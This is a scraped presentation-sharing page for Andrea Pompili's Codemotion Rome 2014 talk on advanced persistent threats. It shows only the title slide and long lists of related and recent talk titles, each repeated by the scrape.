Encoded Attacks And CountermeasuresEncoded Attacks And Countermeasures
Encoded Attacks And Countermeasures
 
Eclipseデバッガを活用するための31のtips
Eclipseデバッガを活用するための31のtipsEclipseデバッガを活用するための31のtips
Eclipseデバッガを活用するための31のtips
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
 
Malware and security
Malware and securityMalware and security
Malware and security
 
Cybercrimes (Against Children)
Cybercrimes (Against Children)Cybercrimes (Against Children)
Cybercrimes (Against Children)
 
Bug Bounty Secrets
Bug Bounty Secrets Bug Bounty Secrets
Bug Bounty Secrets
 
Bug Bounty for - Beginners
Bug Bounty for - BeginnersBug Bounty for - Beginners
Bug Bounty for - Beginners
 
Ransomware: Wannacry
Ransomware: WannacryRansomware: Wannacry
Ransomware: Wannacry
 
Scc2014 :jQueryの仕組みを完璧に理解する
Scc2014 :jQueryの仕組みを完璧に理解するScc2014 :jQueryの仕組みを完璧に理解する
Scc2014 :jQueryの仕組みを完璧に理解する
 
Digital Security for Journalists
Digital Security for JournalistsDigital Security for Journalists
Digital Security for Journalists
 

Similaire à The magic world of APT 0.6 - Pompili

Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Codemotion
 
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...Codemotion
 
Andrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware AnalysisAndrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware AnalysisCodemotion
 
Attacchi, bugie e underground digitale by Andrea Pompili
Attacchi, bugie e underground digitale by Andrea PompiliAttacchi, bugie e underground digitale by Andrea Pompili
Attacchi, bugie e underground digitale by Andrea PompiliCodemotion
 
Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)Codemotion
 
Pompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending storyPompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending storyCodemotion
 
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017Codemotion
 
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...Codemotion
 
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...Codemotion
 
Wearable botnets 201560319_v3
Wearable botnets 201560319_v3Wearable botnets 201560319_v3
Wearable botnets 201560319_v3Codemotion
 
Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?Codemotion
 
Application Security for the masses
Application Security for the massesApplication Security for the masses
Application Security for the massesCodemotion
 
Using Java to build robots with high schoolers
Using Java to build robots with high schoolersUsing Java to build robots with high schoolers
Using Java to build robots with high schoolersVMware Tanzu
 
WordPress Security - Learning From Hacks
WordPress Security - Learning From HacksWordPress Security - Learning From Hacks
WordPress Security - Learning From HacksTony Perez
 
The Web Eats Everything In Its Path Fall 2014
The Web Eats Everything In Its Path Fall 2014The Web Eats Everything In Its Path Fall 2014
The Web Eats Everything In Its Path Fall 2014Tony Parisi
 
SpringOne2GX 2014 Splunk Presentation
SpringOne2GX 2014 Splunk PresentationSpringOne2GX 2014 Splunk Presentation
SpringOne2GX 2014 Splunk PresentationDamien Dallimore
 
Concourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOpsConcourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOpsVMware Tanzu
 
Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Nilesh Sapariya
 

Similaire à The magic world of APT 0.6 - Pompili (20)

Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
 
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
 
Andrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware AnalysisAndrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware Analysis
 
Attacchi, bugie e underground digitale by Andrea Pompili
Attacchi, bugie e underground digitale by Andrea PompiliAttacchi, bugie e underground digitale by Andrea Pompili
Attacchi, bugie e underground digitale by Andrea Pompili
 
Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)
 
Pompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending storyPompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending story
 
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
 
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
 
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
 
Wearable botnets 201560319_v3
Wearable botnets 201560319_v3Wearable botnets 201560319_v3
Wearable botnets 201560319_v3
 
Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?
 
Web+proxy Posts - Page 1
Web+proxy Posts - Page 1Web+proxy Posts - Page 1
Web+proxy Posts - Page 1
 
Application Security for the masses
Application Security for the massesApplication Security for the masses
Application Security for the masses
 
Using Java to build robots with high schoolers
Using Java to build robots with high schoolersUsing Java to build robots with high schoolers
Using Java to build robots with high schoolers
 
WordPress Security - Learning From Hacks
WordPress Security - Learning From HacksWordPress Security - Learning From Hacks
WordPress Security - Learning From Hacks
 
Ignite java-robots
Ignite java-robotsIgnite java-robots
Ignite java-robots
 
The Web Eats Everything In Its Path Fall 2014
The Web Eats Everything In Its Path Fall 2014The Web Eats Everything In Its Path Fall 2014
The Web Eats Everything In Its Path Fall 2014
 
SpringOne2GX 2014 Splunk Presentation
SpringOne2GX 2014 Splunk PresentationSpringOne2GX 2014 Splunk Presentation
SpringOne2GX 2014 Splunk Presentation
 
Concourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOpsConcourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOps
 
Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015
 

Plus de Codemotion

Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...Codemotion
 
Pastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storiaPastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storiaCodemotion
 
Pennisi - Essere Richard Altwasser
Pennisi - Essere Richard AltwasserPennisi - Essere Richard Altwasser
Pennisi - Essere Richard AltwasserCodemotion
 
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...Codemotion
 
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019Codemotion
 
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019Codemotion
 
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 - Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 - Codemotion
 
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...Codemotion
 
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...Codemotion
 
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...Codemotion
 
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...Codemotion
 
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019Codemotion
 
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019Codemotion
 
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019Codemotion
 
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...Codemotion
 
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...Codemotion
 
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019Codemotion
 
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019Codemotion
 
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019Codemotion
 
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...Codemotion
 

Plus de Codemotion (20)

Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
 
Pastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storiaPastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storia
 
Pennisi - Essere Richard Altwasser
Pennisi - Essere Richard AltwasserPennisi - Essere Richard Altwasser
Pennisi - Essere Richard Altwasser
 
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
 
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
 
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
 
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 - Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
 
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
 
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
 
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
 
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
 
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
Sascha Wolter - Conversational AI Demystified - Codemotion Amsterdam 2019
 
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
Michele Tonutti - Scaling is caring - Codemotion Amsterdam 2019
 
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
Pat Hermens - From 100 to 1,000+ deployments a day - Codemotion Amsterdam 2019
 
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
James Birnie - Using Many Worlds of Compute Power with Quantum - Codemotion A...
 
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
Don Goodman-Wilson - Chinese food, motor scooters, and open source developmen...
 
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
Pieter Omvlee - The story behind Sketch - Codemotion Amsterdam 2019
 
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
Dave Farley - Taking Back “Software Engineering” - Codemotion Amsterdam 2019
 
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
Joshua Hoffman - Should the CTO be Coding? - Codemotion Amsterdam 2019
 
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
Mike Kotsur - What can philosophy teach us about programming - Codemotion Ams...
 

Dernier

Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKJago de Vreede
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Victor Rentea
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesrafiqahmad00786416
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWERMadyBayot
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfOverkill Security
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Angeliki Cooney
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfOrbitshub
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...apidays
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 

Dernier (20)

Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 

The magic world of APT 0.6 - Pompili

  • 1. Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROME 11-12.04.2014 www.codemotionworld.com THE MAGIC WORLD OF ADVANCED PERSISTENT THREATS Andrea Pompili There are only 10 types of people in the world: Those who understand binary, and those who don't apompili@hotmail.com
